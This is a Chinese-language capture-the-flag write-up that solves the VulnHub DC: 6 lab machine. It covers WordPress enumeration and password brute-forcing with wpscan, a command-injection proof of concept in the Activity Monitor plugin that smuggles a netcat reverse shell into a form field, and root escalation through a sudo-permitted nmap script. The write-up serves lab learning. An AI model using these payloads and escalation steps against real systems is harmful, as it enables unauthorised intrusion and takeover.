Site icon MkS

[資訊安全] VulnHub – DC: 6 Write-up

DC 系列第六題 DC: 6,這題比較偏向以前解過的 DC: 2,一樣環境都是 WordPress,透過相同手法破密,唯一花費比較久的只有爆破密碼的時間,因為忽略出題者給的提示導致爆破時間過長,一度還以為絲路錯了,該題的整體難度並不算太高,還是或多或少有些許收穫。

環境設定

VirtualBox: Kali & DC: 6
Net Config: NAT Network

尋找靶機

$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 10:23 CST
Nmap scan report for 10.0.2.1
Host is up (0.040s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0017s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00020s latency).
Nmap scan report for 10.0.2.17
Host is up (0.0020s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.40 seconds

$ nmap 10.0.2.17 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 10:24 CST
Nmap scan report for 10.0.2.17
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.95 seconds

解題過程

這題與 DC: 2 一樣,需要手動設置 Hosts,編輯 /etc/hosts 並設置,接著就可以瀏覽到目標頁面了。

sudo vim /etc/hosts
10.0.2.17      wordy

wpscan

一樣是個 WordPress,直接使用 wpscan 列舉資訊,其中發現不少使用者並且 xmlrpc 是開啟的。

[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

套路與 DC: 2 一樣,嘗試每個都用爆爆看,也使用 cewl 嘗試抓取頁面上的英文單字當密碼爆破未果,另外使用 rockyou.txt 幾乎每個跑個 10 分鐘我就放棄了。

沒了線索不斷碰壁,盯著頁面發呆、懷疑人生好幾個小時,直到我重新回到 VulnHub DC: 6 的下載頁面發現…

居然還有 CLUE 這東西,只顧著將靶機載下來,沒想到還藏提示在上面,也就是說密碼確定得要用爆破的。

Create User List File

cat << EOF > dc6_username_list.txt
admin
graham
mark
sarah
jens
EOF

Create Password List File

cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6_password_list.txt

Brute-Force to Login

成功爆出一組密碼 mark::helpdesk01 並登入成功。

$ ./wpscan --url http://wordy/ -U dc6_username_list.txt -P dc6_password_list.txt --max-threads 30
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01                   
Trying sarah / $k011 Time: 00:07:14 <===================================================================               > (12550 / 15218) 82.46% 

Get Shell

登入成功後簡單探勘,發現 Plugin 「Activity monitor」可能含有 RCE 弱點,並且 PoC 也不複雜。

PoC

cat << EOF >> dc6_am_poc.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="ip" value="| nc -nlvp 10.0.2.15 8888 -e /bin/bash" />
      <input type="hidden" name="lookup" value="Lookup" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
EOF

Listen

nc -nl -vv -p 8888

Victim

python -c "import pty;pty.spawn('/bin/bash')"

Get other user

在 home/mark 目錄底下發現有個 stuff 資料夾,資料夾內的 things-to-do.txt 則存放一組 graham 的帳號密碼,藉此用來登入 SSH。

www-data@dc-6:/home$ cd /home/mark
www-data@dc-6:/home/mark$ ls
stuff
www-data@dc-6:/home/mark$ file stuff
www-data@dc-6:/home/mark$ cd stuff
www-data@dc-6:/home/mark/stuff$ ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/home/mark/stuff$ 

Get Shell via SSH

取得 SSH 登入權限之後,使用 sudo -l 獲得了一些資訊,其中最關鍵的地方在於 (jens) NOPASSWD: /home/jens/backups.sh,可以解讀為,使用 jens 身分執行 backups.sh 且不需要輸入密碼。

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

檢查 /home/jens/backups.sh 的內容,是把 /var/www/html 底下的內容壓縮為 backups.tar.gz。

#!/bin/bash
tar -czf backups.tar.gz /var/www/html

Privilege Escalation

藉由修改 backups.sh 來利用 jens 身分操作,將腳本內容改為:

#!/bin/bash
sudo -l

執行後可以得到:

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

使用者 jens 可以利用 sudo 來執行 nmap 且不需要密碼,至於 nmap 如何取得 shell 呢?可以參考 GTFOBins,裡頭包含常見的 Linux 取得 Shell 的各種方法。

將 backups.sh 改寫如下:

#!/bin/bash
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

執行該腳本 sudo -u jens ./backups.sh 直接取得 root 權限。

graham@dc-6:/home/jens$ sudo -u jens ./backups.sh

Starting Nmap 7.40 ( https://nmap.org ) at 2021-02-08 21:09 AEST
NSE: Warning: Loading '/tmp/tmp.Gin4myBpdU' -- the recommended file extension is '.nse'.
# root
# # theflag.txt
# 

Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.

# 
Exit mobile version